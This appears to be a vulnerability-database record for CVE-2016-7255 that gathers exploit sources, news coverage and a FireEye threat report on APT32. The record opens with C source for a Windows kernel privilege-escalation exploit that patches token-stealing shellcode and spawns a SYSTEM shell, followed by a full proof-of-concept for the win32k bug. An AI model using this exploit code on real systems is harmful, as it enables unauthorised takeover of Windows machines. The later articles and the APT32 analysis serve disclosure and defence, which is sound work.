printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n printf(\"Enter to continue...\\n\");\r\n getchar();\r\n \r\n do\r\n {\r\n or_address_value_4((void*)PML4_SELF_REF);\r\n } while (FALSE);\r\n \r\n PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n printf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n \r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n \r\n printf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n DWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n char *p = shellcode;\r\n p += 4; // skip the CLI, PUSHF and MOV RAX bytes \r\n *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n \r\n p += 12; // Patch shellcode with original value in the Overwrite address\r\n *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n \r\n p += 12; // To patch the PID of our process\r\n \r\n *(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n printf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n \r\n if (osversion == 7){\r\n // Exploit Win7.1\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile) {\r\n printf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n 
exit(EXIT_FAILURE);\r\n } \r\n NtQueryIntervalProfile(0x1337, &Interval);\r\n }\r\n \r\n \r\n while (1) {\r\n size = 256;\r\n GetUserName(post_username, &size);\r\n if (memcmp(post_username, pre_username, 256) != 0) break;\r\n }\r\n Sleep(2000);\r\n system(\"cmd.exe\");\r\n \r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26645"}, {"lastseen": "2018-01-03T09:00:04", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2016-11-10T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://0day.today/exploit/description/26297", "id": "1337DAY-ID-26297", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\nFull Proof of Concept:\r\n \r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n \r\n********************************************************************\r\n Created: 2016-11-09 14:23:09\r\n Filename: main.c\r\n Author: root[at]TinySec.net\r\n Version 0.0.0.1\r\n Purpose: poc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n \r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n \r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... 
);\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n \r\n va_start(VaList,Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n \r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n \r\n 
Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n \r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild , GetDesktopWindow() );\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild , TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n \r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if ( 
NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n \r\n return 0;\r\n}\r\n \r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do\r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26297", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:01", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "[](<https://1.bp.blogspot.com/-YHGy8IvdU5A/WCNWb0AOdHI/AAAAAAAAqLQ/ZFC2_5FuLBsj06QydsVi5k6oMzvGFz5vACLcB/s1600/microsoft-security-update.png>)\n\nMicrosoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical [Windows kernel vulnerability](<https://thehackernews.com/2016/10/google-windows-zero-day.html>) (CVE-2016-7255) that had yet to be patched. \n \nThe company [criticized Google's move](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>), claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers \"at potential risk.\" \n \nThe vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday. \n \nSo, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers. 
\n \nAccording to Microsoft's [security bulletin](<https://technet.microsoft.com/library/security/MS16-135>) released today, any hacker who tricked victims into running a \"specially-crafted application\" could successfully exploit the system bug and gain the ability to \"install programs; view, change, or delete data; or create new accounts with full user rights.\" \n \nOnce exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine. \n \nRated as \"important,\" the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks. \n \n[Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) is the same group of hackers that has also been accused by the US Intelligence community of hacking the [Democratic National Committee](<https://thehackernews.com/2016/07/russia-dnc-email-hack.html>), Clinton Campaign Chair [John Podesta](<https://thehackernews.com/2016/10/wikileaks-clinton-leak.html>), and former Secretary of State Colin Powell, among others. \n \nBesides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs. \n \nPatch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge. 
\n \nSo, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today.\n", "modified": "2016-11-09T17:12:11", "published": "2016-11-09T06:12:00", "id": "THN:F8BDC767F3D202913920E1C28D137377", "href": "https://thehackernews.com/2016/11/microsoft-windows-update.html", "type": "thn", "title": "Microsoft Patches Windows Zero-Day Flaw Disclosed by Google", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T11:44:40", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-0859"], "description": "[](<https://thehackernews.com/images/-VgCR2Fih8qA/X3bKP0yAofI/AAAAAAAA3Xk/2BjzswcnClsJubOJnK-h72WdkV--wVjvwCLcBGAsYHQ/s0/exploit-development.jpg>)\n\nWriting advanced malware for a threat actor requires different groups of people with diverse technical expertise to put them all together. But can the code leave enough clues to reveal the person behind it?\n\nTo this effect, cybersecurity researchers on Friday detailed a new methodology to identify exploit authors that use their unique characteristics as a fingerprint to track down other exploits developed by them.\n\nBy deploying this technique, the researchers were able to link 16 Windows local privilege escalation (LPE) exploits to two zero-day sellers \"Volodya\" (previously called \"BuggiCorp\") and \"PlayBit\" (or \"luxor2008\").\n\n\"Instead of focusing on an entire malware and hunting for new samples of the malware family or actor, we wanted to offer another perspective and decided to concentrate on these few functions that were written by an exploit developer,\" Check Point Research's [Itay Cohen and Eyal Itkin](<https://research.checkpoint.com/2020/graphology-of-an-exploit-volodya/>) noted.\n\n## Fingerprinting an Exploit Writer's Characteristics\n\nThe idea, in a nutshell, is to fingerprint an exploit for specific artifacts that can uniquely tie it to a 
developer. It could be in using hard-coded values, string names, or even how the code is organized and certain functions are implemented.\n\nCheck Point said their analysis began in response to a \"complicated attack\" against one of its customers when they encountered a 64-bit malware executable that exploited [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>) to gain elevated privileges.\n\nNoticing the fact that the exploit and the malware were written by two different sets of people, the researchers used the binary's properties as a unique hunting signature to find at least 11 other exploits developed by the same developer named \"Volodya\" (or \"Volodimir\").\n\n[](<https://thehackernews.com/images/-8XQpJ6aaOXE/X3bJepUcWVI/AAAAAAAA3Xc/RKyut5eDU-EfRXvFOJBCku7GCiTWNXJwgCLcBGAsYHQ/s0/malware-1.jpg>)\n\n\"Finding a vulnerability, and reliably exploiting it, will most probably be done by specific teams or individuals who specialize in a particular role. The malware developers for their part don't really care how it works behind the scenes, they just want to integrate this [exploits] module and be done with it,\" the researchers said.\n\nInterestingly, Volodya \u2014 likely of Ukrainian origin \u2014 has been [previously linked](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/>) to selling Windows zero-days to cyberespionage groups and crimeware gangs for anywhere between $85,000 to $200,000.\n\nChief among them was an LPE exploit that leveraged a memory corruption in \"[NtUserSetWindowLongPtr](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra>)\" (CVE-2016-7255), which has been widely used by ransomware operators like GandCrab, Cerber, and [Magniber](<https://securelist.com/magnitude-exploit-kit-evolution/97436/>). 
It's now believed that Volodya [advertised this LPE zero-day](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/zero-day-auction-for-the-masses/>) on the Exploit.in cybercrime forum in May 2016.\n\nIn all, five zero-day and six one-day exploits were identified as developed by Volodya over a period of 2015-2019. Subsequently, the same technique was employed to identify five more LPE exploits from another exploit writer known as PlayBit.\n\n## An Extensive Clientele\n\nStating the exploit samples shared code level similarities to grant SYSTEM privileges to the desired process, the researchers said, \"both of our actors were very consistent in their respective exploitation routines, each sticking to their favorite way.\"\n\nWhat's more, Volodya also appears to have switched up his tactics during the intervening years, with the developer shifting from selling the exploits as embeddable source code in the malware to an external utility that accepts a specific API.\n\nBesides ransomware groups, Volodya has been found to cater to an extensive clientele, including the Ursnif banking trojan, and APT groups such as Turla, APT28, and Buhtrap.\n\n[](<https://thehackernews.com/images/-MNtIN_O8MUA/X3bJJ7ypHuI/AAAAAAAA3XU/cceh7GbuWRUA-YVEd84SYiMoxzAoPtLbwCLcBGAsYHQ/s0/malware.jpg>)\n\n\"The APT customers, Turla, APT28, and Buhtrap, are all commonly attributed to Russia and it is interesting to find that even these advanced groups purchase exploits instead of developing them in-house,\" Check Point observed in its analysis. 
\"This is another point which further strengthens our hypothesis that the written exploits can be treated as a separate and distinct part of the malware.\"\n\nWith cyberattacks expanding in scope, frequency, and magnitude, using an exploit developer's code signature as a means to track down bad actors could provide valuable insight into the black exploit market.\n\n\"When Check Point finds a vulnerability, we demonstrate its severity, report it to the appropriate vendor, and make sure it's patched, so it doesn't pose a threat,\" Cohen said. \"However, for individuals trading these exploits, it's a completely different story. For them, finding the vulnerability is just the beginning. They need to reliably exploit it on as many versions as possible, in order to monetize it to a customer's satisfaction.\"\n\n\"This research provides insight into how that is achieved, and the buyers in this market, which often include nation-state actors. We believe that this research methodology can be used to identify additional exploit writers.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-10-02T10:18:28", "published": "2020-10-02T09:59:00", "id": "THN:89E2A7A39CBD630AB15218875ED90D19", "href": "https://thehackernews.com/2020/10/exploit-development.html", "type": "thn", "title": "Researchers Fingerprint Exploit Developers Who Help Several Malware Authors", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-06-12T18:15:32", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. 
In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. 
and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. 
Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. 
These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. 
Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. 
When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. 
Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. 
For example, APT32 installed one backdoor as a persistent service whose otherwise legitimate service name had a Unicode no-break space (U+00A0) appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing control character, so the name looked identical to the legitimate one in most listings.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized by the deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities of this suite of malware are shown in Table 3.\n\n**WINDSHIELD**\n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 a randomly chosen C2/port pair is used for each connection\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, 